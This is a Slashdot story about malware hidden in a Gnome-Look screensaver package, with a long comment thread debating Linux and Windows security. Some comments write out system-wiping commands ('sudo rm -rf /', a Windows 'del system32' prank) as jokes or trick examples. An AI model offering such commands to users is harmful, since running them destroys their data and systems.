Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Malware Found Hidden In Screensaver On Gnome-Look

timothy posted more than 4 years ago | from the sudo-you-know-what-you're-sudoing dept.

Security 611

AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.

cancel ×

611 comments

Not more safe (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382128)

It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because it's marketshare is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.

This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

The funny thing about this is the same that as with Mac OS X users. All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".

And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.

The only reason malware problems are smaller on Linux than Windows is because of the almost-non-existing desktop marketshare and that those who use it on desktop are usually more tech savvy.

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

Re:Not more safe (5, Insightful)

nschubach (922175) | more than 4 years ago | (#30382196)

The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...

It's not more secure because of it's market share, it's more secure because anyone can fix it.

Re:Not more safe (4, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382240)

But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.

And even so, if the vulnerability is in lets say flash, just anyone or distros can't fix that closed source application.

Re:Not more safe (5, Insightful)

nschubach (922175) | more than 4 years ago | (#30382304)

The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.

It's really the potential quantity of solutions to the problem.

I could argue with you that this vulnerability might have been fixed sooner with more market share.

Re:Not more safe (4, Informative)

sopssa (1498795) | more than 4 years ago | (#30382350)

But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.

Re:Not more safe (3, Insightful)

nschubach (922175) | more than 4 years ago | (#30382484)

You are arguing about ignorance of users, not the security of the OS...

Re:Not more safe (0, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382364)

You're a sodding fscktard. Distros do not pick up public binaries and bundle them unless they're from $BIG_COMPANY like Nvidia. All distros use the projects' source and have dedicated maintainers for each package. You have no idea what you are talking about.

So going by your 11 year old logic, the Internal cannot function. After all, it's 90+% held together with unix and linux systems, mostly open source applications too. So why oh why are they not an anarchy of spam and DoS bots, and 99+% of the crap coming from the tiny windows servers that do little more than handle parked pages for the old backhander form MS sales execs?

When you reach puberty, have real contact with the opposite sex (assuming you're not a gay apple fangay), you'll understand elementary system architecture.

Re:Not more safe (1)

Jetboy01 (550638) | more than 4 years ago | (#30382494)

And the hardest part of all is making sure that the end-user actually bothers performing the updates!

Re:Not more safe (5, Insightful)

sbeckstead (555647) | more than 4 years ago | (#30382258)

Wrong, anyone can not fix it. Any one MAY fix it.

Only the tech savvy programmer types that care enough to fix can fix it.

Re:Not more safe (5, Insightful)

_merlin (160982) | more than 4 years ago | (#30382278)

Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.

Re:Not more safe (2, Insightful)

nschubach (922175) | more than 4 years ago | (#30382378)

But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.

Re:Not more safe (1)

royallthefourth (1564389) | more than 4 years ago | (#30382418)

But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

Not true. It affects the system as a whole because packages need root privileges to install.

Re:Not more safe (2, Insightful)

Anonymous Coward | more than 4 years ago | (#30382712)

1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
2. Even if installed centrally, the applications inside are still run with user privileges.
3. If some application in the package requires setuid rights, it will be detected by the package manager.

Re:Not more safe (4, Informative)

sopssa (1498795) | more than 4 years ago | (#30382432)

But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history malware tried to just fuck over the computer which would had required root access, but now its just about sending spam or stealing data.

Re:Not more safe (2, Funny)

nschubach (922175) | more than 4 years ago | (#30382522)

... which has nothing to do with how secure the operating system is, but the profile itself.

Re:Not more safe (1)

Goaway (82658) | more than 4 years ago | (#30382466)

And how many desktop Linux machines even have more than one user?

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382576)

Technically, all of them. They have a root user and the regular user at least. If they only have a root user, they are asking for trouble, imposed by themselves. In most cases, there are users created for some applications (for instance FTP) that have even stricter access than someone with local login permissions.

Re:Not more safe (3, Informative)

soundguy (415780) | more than 4 years ago | (#30382674)

Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

Re:Not more safe (1)

Rockoon (1252108) | more than 4 years ago | (#30382726)

They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

I'm a bag of mostly water you insensitive clod!

Re:Not more safe (1)

TheDarkener (198348) | more than 4 years ago | (#30382624)

Every LTSP installation ever?

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382288)

Yes, but clueless users aren't going to be knowledgeable enough to download and install the patch. Hell, they probably won't even notice they're infected until months later.

Re:Not more safe (5, Insightful)

kai_hiwatari (1642285) | more than 4 years ago | (#30382322)

This particular malware is not because of a security problem with the OS. It is more of a social engineering thing - trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver.

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382414)

Yeah, but now that the malware was created, it shouldn't be long before for someone prevents another screensaver from doing this again... that's what I was getting at.

Even if it isn't patched immediately, a Linux screensaver has lower potential of screwing up the entire system folder with it's payload.

Re:Not more safe (1)

couchslug (175151) | more than 4 years ago | (#30382548)

"trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver."

Screensavers are an easy threat to negate. I don't run them, on any OS.
It's natural to bait people who prefer fluff over control with fluff.

Re:Not more safe (4, Insightful)

Anonymous Coward | more than 4 years ago | (#30382702)

This particular malware is not because of a security problem with the OS.

Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.

Re:Not more safe (1)

nhytefall (1415959) | more than 4 years ago | (#30382198)

Agreed.

The easiest, and most effective, way to avoid issues with malware/spyware/etc is to not be an idiot.

Code is code... regardless of the platform it was developed on/for... code still runs if written correctly.

Re:Not more safe (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382208)

your an idiot.

Re:Not more safe (3, Insightful)

phantomcircuit (938963) | more than 4 years ago | (#30382212)

This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

Well that's why the goal is to get as much of the third party software into the repository as possible.

Re:Not more safe (2, Interesting)

Goaway (82658) | more than 4 years ago | (#30382500)

And thus you raise the threshold for entry for new third-party software.

Re:Not more safe (1)

phantomcircuit (938963) | more than 4 years ago | (#30382542)

That's kind of the point...

Re:Not more safe (5, Insightful)

Anonymous Coward | more than 4 years ago | (#30382220)

All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.

Re:Not more safe (2, Interesting)

sopssa (1498795) | more than 4 years ago | (#30382286)

Any (good) linux sysadmin knows that there has been many Linux worms in the history. Yes, history. You're also referencing to a 2003 Windows worm here.

Conficker aside, such worms are pretty much in history. Most malware now a days comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)

Re:Not more safe (2, Interesting)

DragonWriter (970822) | more than 4 years ago | (#30382486)

Most malware now a days comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)

There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using something a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.

While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks by providing elegant, non-intrusive ways to provide the control users need without always running as a superuser before Windows did much in that regard, it shares with Windows a fairly all or nothing security model in many regards that is particularly susceptible to trojans.

Re:Not more safe (1)

kenshin33 (1694322) | more than 4 years ago | (#30382604)

an most linux systems are kinda locked down. privilege separation. Every day's simple tasks don't need root privileges. Though, distros like Ubuntu are killing that a bit with the "sudo" philosophy (implicite priviledge gain, like the annoying thing in VISTA). Where as the old "su" aproach (explicitly requesting root priviledge in a terminal) is less vulnerable to this kind of tricks. Worst case user's files get erased (backup backup and backup). but the whole system integrity is untouched.

Re:Not more safe (2, Insightful)

Suiggy (1544213) | more than 4 years ago | (#30382230)

I agree. The best software in the world can't protect itself from clueless ignorant users who don't know any better. The more clueless, ignorant users using the software, the higher the rate of occurrence of exploitation. If Linux were to become as popular as Windows, I guarantee it would have just as many problems as Windows users currently suffer from.

Re:Not more safe (0, Troll)

nschubach (922175) | more than 4 years ago | (#30382332)

One major difference is that malware on Windows can screw up the entire system where Linux will most likely only screw up one profile.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382446)

It doesn't help when you have a clueless ignorant user involved. Teach such a person how to use sudo and inevitably they're going to elevate privileges requested by malware. I mean, by golly, if they want to install that screen saver with cute kittens, then they're going to install it, sudo be damned. Most people aren't as paranoid as you or I may be when it comes to trusting the content and software we download, and they may not be able to draw the association with it possibly having a trojan/virus payload. Afterall, all they see are the cute kittens.

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382612)

Truthfully, I'm not sure if screen savers require root access to install, but it wouldn't be that difficult to change that. Each user picks their own screensaver so it goes to say that it could be stored and run from their own binary folder.

That's also why I don't give my parents the sudo password.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382668)

Normally, screen savers do not require admin privileges to run, you just run them out of your user directory. But in this case, the screensaver was packaged in a .deb which does require administrator privileges. sudo dpkg -i cute_kittens_screen_saver.deb

Re:Not more safe (5, Interesting)

nurb432 (527695) | more than 4 years ago | (#30382476)

Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.

And if you cant trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.

Re:Not more safe (1)

Anonymous Coward | more than 4 years ago | (#30382246)

The diference is that on windows, malware can install it self just by looking at it.
To get this linux malware you need to sudo and install a package.

If i tell you to type "sudo rm -rf /" and enter your password when asked, will we see
article like "OMG! UBUNTU GOT MALWARE" the next day too?

The point is, if you do no whant malware, do no install it.

Re:Not more safe (1)

eln (21727) | more than 4 years ago | (#30382390)

So how often do you download a package from somewhere, unpack it, and go line by line through the source to make sure it's safe before installing it on your box? Probably not very often, because that would be a huge pain and even most Linux users won't be able to understand the code well enough to make a good judgment. On a server box, you'll likely stick to production repositories direct from your vendor, so the risk of malware is low, but I'm sure most people have downloaded packages from third parties for their desktop systems and run them without being absolutely sure they were safe. With Linux, you can get away with this because none of the malware writers care enough about Linux to port their software to it, but they certainly would if it gained significant market share.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382554)

[quote] If i tell you to type "sudo rm -rf /" and enter your password when asked, will we see article like "OMG! UBUNTU GOT MALWARE" the next day too? [/quote] You would be surprised. If Linux were popular, and were used by many people who were novice users, such as is the case with Windows, then yes, they would be doing exactly that. It's a common joke on certain tech forums and image boards to trick users into entering "runas /profile /user:administrator del c:\windows\system32" and many unsuspecting people fall for it.

Re:Not more safe (5, Interesting)

_merlin (160982) | more than 4 years ago | (#30382248)

It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no-one wants.

Re:Not more safe (1)

ChienAndalu (1293930) | more than 4 years ago | (#30382408)

The difference is that there isn't a common software repository for windows like there is for Linux. If you want a screensaver for Linux, you can get tons with xscreensaver. For windows, the software ecosystem is much more confusing.

Google's netbook won't even have the capability to install software.

Re:Not more safe (2, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382464)

The software ecosystem is "much more confusing" because it's an OS with 95% marketshare and theres millions of 3rd party programs and games for users. And they really want and need those.

Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.

Re:Not more safe (1, Insightful)

JoshuaZ (1134087) | more than 4 years ago | (#30382264)

Not really. Linux does a better job in many ways of dealing with serious security holes. While you are correct that if marketshare was reversed there would be a corresponding flip in total malware, I suspect that the amount of malware targeting Linux in our alternate universe would be less than the amount of malware targeting Windows in the real universe. Likely the same order of magnitude, but still different. (I'm ignoring for now the issue of how one would reasonably measure or even define how much malware is out there targeting a given system).

The real lesson here is that at the end of the day it still comes down to who the users are. Users who are paranoid are less likely to get problems. Most people don't have the resources or will to be paranoid.

Re:Not more safe (5, Interesting)

Anonymous Coward | more than 4 years ago | (#30382268)

You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on windows, but for most things I need to do on linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.

Repositories are getting a lot better too, I don't use ubuntu any more but when I left the PPA was in ascendancy, which seemed to allow a much better enforcement of security while still letting 3rd party stuff in.

Re:Not more safe (4, Insightful)

NoobixCube (1133473) | more than 4 years ago | (#30382442)

Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.

When you install a theme the normal way, you just drag the archive file - that is to say, no executeable parts, or any way to make the parts executeable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privilages because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unneccessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different to Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.

Re:Not more safe (1, Troll)

danomac (1032160) | more than 4 years ago | (#30382282)

There would definitely be more, but I seriously doubt as much as Windows. Most of the drive-by exploits require root privileges to do anything serious to the machine. Almost everything is used without root privileges and so those types of attacks plain don't work. (I'm referring to Windows computers being infected just by being plugged into the internet.) I can't remember the last time I heard of something like this happening with linux.

Voluntarily installed malware by using social tactics and the like will still affect linux, but the amount of damage it can do to the local machine is still far less than the damage that can happen to Windows.

Re:Not more safe (1)

sopssa (1498795) | more than 4 years ago | (#30382324)

But the thing is, most malware doesn't even need root access to do it's job. Stealing users data and sending spam works just as well from user base.

Requiring root access is mostly for those who want control over that exact machine, like hackers.

Re:Not more safe (1)

TrancePhreak (576593) | more than 4 years ago | (#30382706)

Several priveledge escalation holes have been found in Linux over the years. They could have gotten root if they wanted.

Re:Not more safe (5, Insightful)

amasiancrasian (1132031) | more than 4 years ago | (#30382292)

I've been telling many the same thing, but with one exception; Mac and *nix have started out with a better permissions system and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g, the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.

While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompted were being triggered by transitioning software developers that did not save data in the user's home folder.

In the end, the security of any system relies on the ability for the user to authenticate and verify software downloaded. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.

Re:Not more safe (0, Troll)

amasiancrasian (1132031) | more than 4 years ago | (#30382310)

I would like to clarify that when I mean "not any more secure," I mean the current version of Windows 7 that implements a good permissions framework along with UAC. Mac OS X/*nix have a leg up with a strong permissions-based system from the very get-go.

Re:Not more safe (1)

maxume (22995) | more than 4 years ago | (#30382422)

You should talk about secure defaults, the only real change in Vista and Windows 7 was that accounts are not generally created as Administrators (I guess UAC adds a little more than just the UI, but not a great deal), both NT and XP share much of the underlying permissions framework...

Re:Not more safe (1)

davek (18465) | more than 4 years ago | (#30382396)

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

Absolutely FALSE! The numbers would be closer, but not equal. By definition, you cannot know all the vulnerabilities in "secret source" software, because they are simply not disclosed. This number is surely more than zero. Therefore, all other things being equal. open source will always prevail because the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

Re:Not more safe (0, Flamebait)

sexconker (1179573) | more than 4 years ago | (#30382638)

Absolutely FALSE! The numbers would be closer, but not equal. By definition, you cannot know all the vulnerabilities in "secret source" software, because they are simply not disclosed. This number is surely more than zero. Therefore, all other things being equal. open source will always prevail because the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

Absolute HOKUM! The numbers would be nearly identical. The protection of software being open source requires that you:

Trust the creator
Trust the host (to make sure it is unaltered)

Closed source software requires that you:
Trust the creator
Trust the host (often the creator)

The fact that you CAN read every line of code does not make the software safer. The fact that SOMEONE MAY does not make the software safer. The fact that someone DID does not make the software safer unless you trust that person for some reason.

The ONLY thing that makes the software safer is YOU reading and understanding every single line of code.

Closed source software is usually PAID for, with specific stipulations on what it can and can't do (feature-wise and security-wise). Money talks louder than "freedom", and unfortunately it always will.

Now, begin the closed source vs open source stability/support/security/update process data point cherry picking!

Here's my data point: Everything sucks and I'm disgusted that people put up with it - paid or not. (No, I'm not gonna do anything to fix it - I can idly bitch all I want!)

Re:Not more safe (1)

jedidiah (1196) | more than 4 years ago | (#30382412)

> And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not?

Linux doesn't go out of it's way to do stupid things for a dubious gain in "convenience".

Linux never bought into this idea of blurring the line between data and programs. Linux never encouraged executing random executables from unknown and untrusted sources.

Neither did MacOS, or FreeBSD, or any of the commercial Unixen.

In that regard, merely avoiding Microsoft apps while running their OS can avoid most of the potential trouble.

Re:Not more safe (1)

Kjella (173770) | more than 4 years ago | (#30382440)

Linux can't cure idiocy. But the repositories are a pretty solid base of tools before they start wanting to shoot themselves in the foot. How many people are infected by the time they're done warezing up their computer with "basic" tools like Windows itself, MS Office etc? Quite many. How many people block or are blocked from patches because they're not a "genuine" install? It would help.

P.S. PDF is quite safe, Adobe PDF Reader on the other hand is not but luckily us Linux users in general don't use it. Same goes for flash, hopefully HTML5 will make it much less common because it's the flash player that is crappy, the standard is quite fine.

Re:Not more safe (1)

gandhi_2 (1108023) | more than 4 years ago | (#30382444)

Which is a great argument against monoculture, something the "linux zealots" have been warning us about for years.

Re:Not more safe (5, Insightful)

at_slashdot (674436) | more than 4 years ago | (#30382452)

You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.

Malware is piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.

"Repositories won't help with that, because people want 3rd party programs and games."

I am happy with 25,000+ programs available in Debian repository, I never install random package from the Internet. At least the basic packages should be available from the repos so the risk is at least reduced if not eliminated (depending on the behavior of the user)

In my experience people who use the word "zealot" lack arguments.

Re:Not more safe (0)

Anonymous Coward | more than 4 years ago | (#30382504)

It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows.

Linux IS more secure against malware than Windows. It certainly isn't completely safe, but it's leaps and bounds ahead of Windows in that regard, marketshare aside.

Re:Not more safe (1)

SnarfQuest (469614) | more than 4 years ago | (#30382520)

In my experience, >90% of Windows systems that I am asked to look at are packed full of virus, adware, and other malware. I've only seen one Linux system infected with anything, and that was a long time ago.

The "inexistant desktop" meme doesn't matter to me. Besides being nonsense, the fact that Linux machines don't melt into a malware pile of crap 30 seconds after connecting to the internet, is what makes me prefer them. I don't think Windows machines could be more malware acceptable if Microsoft actually tried to design it to be so.

It is exploiting a weakpoint that can be resolved. (0)

Anonymous Coward | more than 4 years ago | (#30382592)

The tools exist that would have rendered this form of attack useless.

Linux has out lasted many forms of attack already. Hardening of the package system to prevent such problems is not hard.

Simple point is a lot of infection vectors don't exist into Linux. Package manager is one of the major targets left.

"And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable."

If you system is setup right you cannot. Browser inside a selinux sandbox. The tech to shut all this crap down is waiting in the wings. Just up until now there has been no critical need to deploy. Massive amount of damage risk can be contained.

Linux response the threats enabled more secuirty.

Re:Not more safe (4, Insightful)

vadim_t (324782) | more than 4 years ago | (#30382686)

Sorry, this line of argument is stupid.

You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets less viruses because it has less marketshare.

But if so, why all the security advancements in the latests Windows versions? Why isn't it still using Win95 era security? Why did MS bother coding support for NX, UAC and so on? Well, because turns out, it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.

Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.

Re:Not more safe (1)

SanityInAnarchy (655584) | more than 4 years ago | (#30382690)

Repositories won't help with that, because people want 3rd party programs and games.

As phantomcircuit says, that's a reason to put more software in repositories, or provide sane sandboxing for it. Speaking of which, when have you bought a game at the store, and found it pre-infected with malware?

However, at least the option exists. Show me where I can have an even halfway decent experience on Windows while sticking to trusted sources. Seriously, try to live with only what's available on Microsoft Update. Contrast this with the tens, even hundreds of thousands of packages for your typical Linux distribution.

All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".

That's true, and I agree with you that this could be a problem. The solution to security is not merely to put people on another OS, it's to actually educate them about security.

That's also why you want to look at what tech-savvy people do for security, and how easy it is for them. If tech-savvy people on Linux get most of their software from repositories, and Windows and OS X don't have package management, that should tell you something.

However, I don't think it's harmful or incorrect to say that Linux is more secure than Windows, and that antivirus doesn't do much on either, other than protect you from yourself.

And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability?

On Windows, there are still significant browser vulnerabilities which would be problematic. Additionally, they've only even tried to start reducing user privileges with Vista -- before that, surfing porn sites would likely get your machine completely rooted, as opposed to just having access as an ordinary user.

Now consider browsers like Chrome, which actually sandbox the browser process, chroot it, and run it as a separate user.

That brings up another point: IE has historically been swiss cheese, as far as security is concerned, yet it is still the default browser on Windows. The default browser on most Linux distributions is Firefox.

Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.

Flash? Maybe. All the more reason to get rid of it, and promote standards for which there are actually alternate implementations, like html5. Or just use Gnash -- though admittedly, this significantly limits what will work for you, so far.

PDF? PDF is a file format, not a program. I don't view them with Adobe Reader -- on KDE, I use a program called Okular, and it's something else on GNOME. Good luck finding something that exploits all of these at once. And hey, if you do find an exploit in Okular, go ahead and fix it -- can't do that with Acrobat.

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

I don't think we can actually make that call.

First of all, Linux is not "one thing", even less so than Windows is. If Linux had 95% of the desktop marketshare, that would be Linux, and probably not even strictly Linux, but free Unix. You'd still have some people running FreeBSD, some people running OpenSolaris, some people running Ubuntu, some people running a custom-complied Gentoo, and so on. The same things which make people imagine that porting proprietary software on Linux is hard (it really isn't), would make it much more difficult for an exploit to work.

Granted, most versions would probably have the vulnerability, but each version would have to be exploited slightly differently, since exploiting a buffer overflow (for example) requires intimate knowledge of where, exactly, everything will be.

Second, Intel would probably not be dominating the market so completely. Malware for x86 would have to be ported to x64, ARM, etc. Linux is ported to dozens of architectures, and most Linux programs are just as portable, since they're distributed as reasonably portable C source.

Finally, the market in general would be so completely different that to actually state something like this is moronic. For all we know, there would be more malware, but it'd all be distributed as some sort of source code, probably a script.

Re:Not more safe (-1, Troll)

Anonymous Coward | more than 4 years ago | (#30382728)

BS. OS X has been out for a number of years and has yet to be hit by malware yet. If Linux is cracked wide open with its insignificant market share, imagine the security nightmare if it had a real base.

I will stick to OS X, being virtually 100% secure, thank you very much.

Amazed I am (1)

sbeckstead (555647) | more than 4 years ago | (#30382214)

Hey malware creators just got wise to the fact that Geeks make more money than the average Joe?

Re:Amazed I am (1)

sexconker (1179573) | more than 4 years ago | (#30382672)

Hey malware creators just got wise to the fact that Geeks make more money than the average Joe?

Lies.

The proverbial Linux box is a P4 2.8 GHz with 512 MB of RAM that you're gonna upgrade to 1 GB soon.

The up-and-comer is a Core 2 Duo 2 GHz with 2 GB of RAM.

Surely Joe Tux Hack can afford better hardware!

Of course the ninja was infected... (-1, Offtopic)

NecroPuppy (222648) | more than 4 years ago | (#30382222)

The ninja is a cockroach.

He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.

Let this be a lesson to you, Remo. Never trust the ninja.

Re:Of course the ninja was infected... (2, Funny)

royallthefourth (1564389) | more than 4 years ago | (#30382340)

He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.

So Solaris users are unaffected?

YES! Finally! (5, Funny)

binarylarry (1338699) | more than 4 years ago | (#30382238)

It's the YEAR OF THE LINUX desktop! It's official! /Happy Ubuntu User

Removal instructions from the site (2, Insightful)

Xerp (768138) | more than 4 years ago | (#30382266)

"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552" Man. I'm going to have to get me some anti-malware software...

The Elegance of Programming (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382370)

"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552"

There is an easier (read: more elegant) way to get rid of this Linux malware:

sudo rm -rf /

Re:The Elegance of Programming (3, Funny)

sexconker (1179573) | more than 4 years ago | (#30382684)

There is an easier (read: more elegant) way to get rid of this Linux malware:

sudo rm -rf /

Pussies.
rm -rf /
works fine for me!

Re:Removal instructions from the site (4, Insightful)

wizardforce (1005805) | more than 4 years ago | (#30382426)

This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.

Re:Removal instructions from the site (1)

wizardforce (1005805) | more than 4 years ago | (#30382530)

That malware was such a simple script... It could have done boat loads more damage than it did. Lock out the user from sudo by changing the sudoers file, replacing the password hash for root, IN that case just about the only thing that you can do is grab a live cd and fix the problem...

Re:Removal instructions from the site (0)

Anonymous Coward | more than 4 years ago | (#30382662)

That's missing the point though. They don't WANT people to realise the machine is compromised. Kinda like Ebola....it's so hostile to the host it tends to largely self-contain.

Re:Removal instructions from the site (4, Insightful)

selven (1556643) | more than 4 years ago | (#30382676)

A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.

Repositories! (1)

h4rr4r (612664) | more than 4 years ago | (#30382338)

This is why you only install packages from the repositories.

Re:Repositories! (-1, Flamebait)

sopssa (1498795) | more than 4 years ago | (#30382398)

And that is why there will never be the year of the linux on desktop.

Re:Repositories! (4, Insightful)

binarylarry (1338699) | more than 4 years ago | (#30382468)

Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?

Re:Repositories! (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382510)

Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.

Re:Repositories! (4, Informative)

wizardforce (1005805) | more than 4 years ago | (#30382642)

